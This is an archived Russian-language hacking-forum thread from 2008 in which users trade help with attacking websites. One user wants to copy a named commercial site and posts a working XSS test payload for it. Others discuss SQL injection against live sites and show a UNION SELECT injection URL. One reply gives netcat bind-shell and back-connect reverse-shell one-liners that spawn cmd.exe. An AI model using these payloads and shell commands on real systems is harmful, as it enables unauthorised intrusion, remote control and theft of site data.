ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос о XSS
  #4241  
Старый 21.12.2008, 22:46
WaterSpirit
Новичок
Регистрация: 21.12.2008
Сообщений: 3
Провел на форуме:
13074

Репутация: 10
Question Вопрос о XSS

Здравствуйте.
У меня к вам вот какой вопрос, есть сайт movieweb.com очень хочется его слить, но честное слово незнаю как это делается
Проверил на XSS в графе поиск фильма проходит
Код:
"><script>alert(555)</script>
, а что дальше делать незнаю
На форуме nulled.ws народ как-то делает рипы. Помогите сделать рип этого сайта или подскажите. что делать.
Заранее Вас благодарю.
 
Ответить с цитированием

  #4242  
Старый 21.12.2008, 22:52
The matrix
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345

Репутация: 573
Отправить сообщение для The matrix с помощью ICQ
По умолчанию

Цитата:
Сообщение от WaterSpirit  
Здравствуйте.
У меня к вам вот какой вопрос, есть сайт movieweb.com очень хочется его слить, но честное слово незнаю как это делается
Проверил на XSS в графе поиск фильма проходит
Код:
"><script>alert(555)</script>
, а что дальше делать незнаю
На форуме nulled.ws народ как-то делает рипы. Помогите сделать рип этого сайта или подскажите. что делать.
Заранее Вас благодарю.
Если XSS пассивная, то я сомневаюсь, что тебе удастся что-то сделать... Шансов мало. Нужно что-то более действенное
 
Ответить с цитированием

  #4243  
Старый 21.12.2008, 22:56
WaterSpirit
Новичок
Регистрация: 21.12.2008
Сообщений: 3
Провел на форуме:
13074

Репутация: 10
По умолчанию

Цитата:
Сообщение от The matrix  
Если XSS пассивная, то я сомневаюсь, что тебе удастся что-то сделать... Шансов мало. Нужно что-то более действенное
Если честно незнаю какая
 
Ответить с цитированием

  #4244  
Старый 21.12.2008, 22:58
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от WaterSpirit  
Здравствуйте.
У меня к вам вот какой вопрос, есть сайт movieweb.com очень хочется его слить, но честное слово незнаю как это делается
Проверил на XSS в графе поиск фильма проходит
Код:
"><script>alert(555)</script>
, а что дальше делать незнаю
На форуме nulled.ws народ как-то делает рипы. Помогите сделать рип этого сайта или подскажите. что делать.
Заранее Вас благодарю.
Здравствуйте, по манере выражаться, Вы производите впечатление интелигентного человека, а вот по смыслу вопроса, о Вас такого не скажешь

С помощью пассивной XSS врятли Вам удастся сделать рип сайта , что-же касается Вашего вопроса по поводу "подскажите", думаю Вам для начала стоит поискать информацию по теме XSS, и ознакомится с ней, это тема не предназначена для ответов на такие обширные вопросы , рекоммендую прочесть и понять то , что написано сдесь:

http://old.antichat.ru/crackchat/index.html
https://forum.antichat.ru/thread20140.html
 
Ответить с цитированием

  #4245  
Старый 21.12.2008, 23:13
WaterSpirit
Новичок
Регистрация: 21.12.2008
Сообщений: 3
Провел на форуме:
13074

Репутация: 10
По умолчанию

Цитата:
Сообщение от jokester  
Здравствуйте, по манере выражаться, Вы производите впечатление интелигентного человека, а вот по смыслу вопроса, о Вас такого не скажешь

С помощью пассивной XSS врятли Вам удастся сделать рип сайта , что-же касается Вашего вопроса по поводу "подскажите", думаю Вам для начала стоит поискать информацию по теме XSS, и ознакомится с ней, это тема не предназначена для ответов на такие обширные вопросы , рекоммендую прочесть и понять то , что написано сдесь:

http://old.antichat.ru/crackchat/index.html
https://forum.antichat.ru/thread20140.html
Спасибо, что ответили, а также за просвеление примерно понял, что такое XSS. Что касаемо вопроса, то уже достаточно давно ищю скрипт что-то между кинопоиска и стандартного видеокаталога. А этот сайт как раз то что нужно. Такого скрипта наврядли где найдешь. Вот и мучает вопрос как с сие чудо мысли сделать рип. На другом форуме рипы делают но скрывают за такими сообщениями, которые я буду набирать года два не меньше это если с флудом, что не очень правильно. Поэтому пришел к мысли либо кого-то попросить рипануть либо как-нить самому это сделать, потому как аналогов я еще пока не видел.
Заранее прошу прощения за данное сообщение, так как оно может расцениватся как флуд.
 
Ответить с цитированием

  #4246  
Старый 22.12.2008, 08:48
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

подставляю ковычку
он мне выдает

Microsoft VBScript runtime error '800a000d'

Type mismatch: 'cint'

/instructorDesc.asp, line 45

возможна ли скуль?
 
Ответить с цитированием

  #4247  
Старый 22.12.2008, 09:23
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

У MJDE должна быть немного другая ошибка. Полагаю, что тут инъекции нету.
 
Ответить с цитированием

  #4248  
Старый 22.12.2008, 15:32
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию

Цитата:
Сообщение от SHS  
Как порт слушать я то знаю, только при коннекте команды не исполняются, а просто выводятся на экран (то что напишешь)
nc -l -p ПОРТ -d -e cmd.exe -BIND
nc host порт -d -e cmd.exe -Back-Connect

Последний раз редактировалось The_HuliGun; 22.12.2008 в 15:36..
 
Ответить с цитированием

  #4249  
Старый 22.12.2008, 18:01
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941

Репутация: 2
Talking

Спасиб
 
Ответить с цитированием

  #4250  
Старый 22.12.2008, 18:23
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию

Товарищи выручите плз еще раз
Такая ситуация, нашел иньекцию на сайте(версия мускула > 5 ), Нашел колонку которая интересна, теперь при запросе:
xxx.com/index.php?id=-1+union+select+1,2,3+from+user/*
Мне выдает:
Table 'sitename.user' doesn't exist

В чем ошибка? O_O

P.S. ссылку не дам
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ